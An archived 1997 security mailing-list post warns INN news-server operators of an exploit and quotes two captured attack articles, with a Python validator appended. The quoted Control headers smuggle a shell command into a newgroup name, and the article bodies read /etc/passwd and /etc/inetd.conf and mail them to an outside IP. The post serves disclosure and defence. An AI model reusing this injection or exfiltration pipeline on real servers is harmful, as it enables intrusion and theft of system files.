[80] in Best-of-Security


BoS: INND exploited...

daemon@ATHENA.MIT.EDU (Joseph J. Snyder III)
Sun Mar 16 04:41:52 1997

From: "Joseph J. Snyder III" <jsnyder@plasma.ea.wsoc.com>
Date: Sun, 16 Mar 97 0:13:03 EST
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net


        Just dropping a quick line for those of you who did not take
        the advice of the CERT 97:08-innd advisory.  If you are using
        innd 1.5 or lower then you probably got hacked last night starting
        around 4:45 EST.  The attack made use of the exploit to
        gain information (/etc/passwd/, os version, routes, inetd.conf).
        This attack also started telnet connections from the news server to
        a remote host.  At this time I do not have any further information.
        The following is a sample of how the exploit.


        Unparseable newgroup by tale@uunet.uu.net
         Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!gatech!EU.net!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
         From: tale@uunet.uu.net (David C Lawrence)
         Newsgroups: comp.sys.mac.printing
         Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
         Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
         Approved: newgroups-request@uunet.uu.net
         Message-ID: <830201540.9220@uunet.uu.net>
         Date: Sat, 15 Mar 1997 15:15:15 GMT
         Lines: 4
             
         #+
         (/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
              

        Unsafe newgroup by tale@uunet.uu.net
        Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!sbcntrex!news.eecs.umich.edu!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
        From: tale@uunet.uu.net (David C Lawrence)
        Newsgroups: comp.sys.mac.printing
        Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
        Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
         Approved: newgroups-request@uunet.uu.net
         Message-ID: <830201540.9223@uunet.uu.net>
         Date: Sat, 15 Mar 1997 15:15:15 GMT
         Lines: 4

         #+
          (/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
         #-

        I'm sorry about the informality of this post.
        If anyone else has more info, please contribute.


        joe.

        Joseph J. Snyder III
        Litton-PRC, Inc.
        Network Security Engineer
        http://c3i.wsoc.com/
        jsnyder@plasma.ea.wsoc.com
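As an added, defender-side illustration (not part of the original post, and not INN's own code): a small Python checker that parses an article's header block and refuses to treat the argument of a newgroup/rmgroup Control: header as a group name unless it matches a strict whitelist, logging a verdict in the style of the "Unsafe newgroup by ..." lines quoted above. The group-name grammar, the sample articles (which use a harmless placeholder command in place of the real payload) and the exact log wording are assumptions of this example.

```python
import re

# Assumed newsgroup-name grammar for this example: dot-separated components of
# letters, digits, '+', '-' and '_'.  Anything outside this is not a group name.
VALID_GROUP = re.compile(r"^[A-Za-z0-9][A-Za-z0-9+_-]*(?:\.[A-Za-z0-9][A-Za-z0-9+_-]*)*$")

# Characters that carry meaning to /bin/sh.  A "group name" containing any of
# these must never be handed to a shell-based control-message handler.
SHELL_META = set("`$|;&<>(){}'\"\\")


def parse_headers(raw_article):
    """Split the header block (up to the first blank line) into a dict keyed by
    lower-cased header name.  Folded continuation lines are not handled."""
    headers = {}
    for line in raw_article.splitlines():
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def sender_address(from_header):
    """Pull the bare address out of 'tale@uunet.uu.net (David C Lawrence)'."""
    m = re.search(r"[^\s<>()]+@[^\s<>()]+", from_header or "")
    return m.group(0) if m else "<unknown>"


def classify_control(control_value):
    """Return (verdict, verb, group) for the value of a Control: header.

    verdict is one of: none, other, ok, unsafe, unparseable."""
    if control_value is None:
        return ("none", None, None)
    parts = control_value.split(None, 2)
    verb = parts[0].lower()
    if verb not in ("newgroup", "rmgroup"):
        return ("other", verb, None)
    if len(parts) < 2:
        return ("unparseable", verb, "")
    group = parts[1]
    if VALID_GROUP.match(group):
        return ("ok", verb, group)
    # Whitelist failed: distinguish an active shell-injection attempt from a
    # merely malformed name so the two show up differently in the log.
    if SHELL_META & set(group):
        return ("unsafe", verb, group)
    return ("unparseable", verb, group)


def audit(raw_article):
    """Classify one article and build an INN-style log line."""
    headers = parse_headers(raw_article)
    verdict, verb, _group = classify_control(headers.get("control"))
    sender = sender_address(headers.get("from"))
    return (verdict, f"{verdict.capitalize()} {verb or 'control'} by {sender}")


# Constructed sample articles (not real traffic): a legitimate newgroup, a group
# name carrying shell metacharacters in the shape of the attack above (with a
# placeholder command), and a malformed name with no shell metacharacters.
GOOD = (
    "From: tale@uunet.uu.net (David C Lawrence)\n"
    "Control: newgroup comp.sys.mac.printing moderated\n"
    "\nbody\n"
)
BAD = (
    "From: tale@uunet.uu.net (David C Lawrence)\n"
    "Control: newgroup `/bin/echo:x` moderated\n"
    "\n#+\nbody\n#-\n"
)
ODD = (
    "From: someone@example.invalid\n"
    "Control: newgroup comp..printing\n"
    "\nbody\n"
)

if __name__ == "__main__":
    for article in (GOOD, BAD, ODD):
        print(audit(article)[1])
```

The point of the check is that the control handler decides what a group name may look like before any string derived from the article reaches a shell; a name that fails the whitelist is logged and dropped, never executed. Whitelisting the name is the defensive complement to the patched INN release the cited CERT advisory points to, not a substitute for upgrading.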


          

